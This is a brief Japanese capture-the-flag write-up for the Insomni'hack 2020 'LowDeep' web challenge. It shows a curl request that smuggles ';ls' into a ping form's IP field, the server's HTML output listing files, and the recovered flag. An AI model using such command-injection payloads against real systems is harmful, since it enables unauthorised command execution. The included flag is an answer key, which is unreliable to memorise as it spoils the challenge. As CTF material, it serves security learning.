LowDeep (web)

OSコマンドインジェクションをしてみる。

$ curl http://lowdeep.insomnihack.ch/ -d 'ipaddr=8.8.8.8;ls'
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Insomni'hack 2020 Teaser</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js"></script>
  <style>
  body {
 background-image: url("_res_/img/skull-slim.png");
 background-color: #cccccc;
}
  </style>
</head>

<body>
<div class="container p-3 my-3 bg-dark text-white">
  <h2>LowDeep Plateform </h2>
  <p>That's our new plateform to perform ping the easy way.</p>

  <form action="#" method="post">
    <div class="form-group">
      <label for="ip">Enter the IP address to ping:</label>
      <input type="text" class="form-control" id="ip" name="ipaddr">
    </div>
    <input type="submit" name="submit" value="Submit" class="btn btn-primary" />
    <div>
    	</br>PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.</br>64 bytes from 8.8.8.8: icmp_seq=1 ttl=59 time=1.33 ms</br></br>--- 8.8.8.8 ping statistics ---</br>1 packets transmitted, 1 received, 0% packet loss, time 0ms</br>rtt min/avg/max/mdev = 1.338/1.338/1.338/0.000 ms</br>_res_</br>index.php</br>print-flag</br>robots.txt    </div>
  </form>
</div>
</body>
</html>

ファイル群の中にprint-flagがあることがわかるので、ダウンロードして実行してみる。

$ ./print-flag 
INS{Wh1le_ld_k1nd_0f_forg0t_ab0ut_th3_x_fl4g}

INS{Wh1le_ld_k1nd_0f_forg0t_ab0ut_th3_x_fl4g}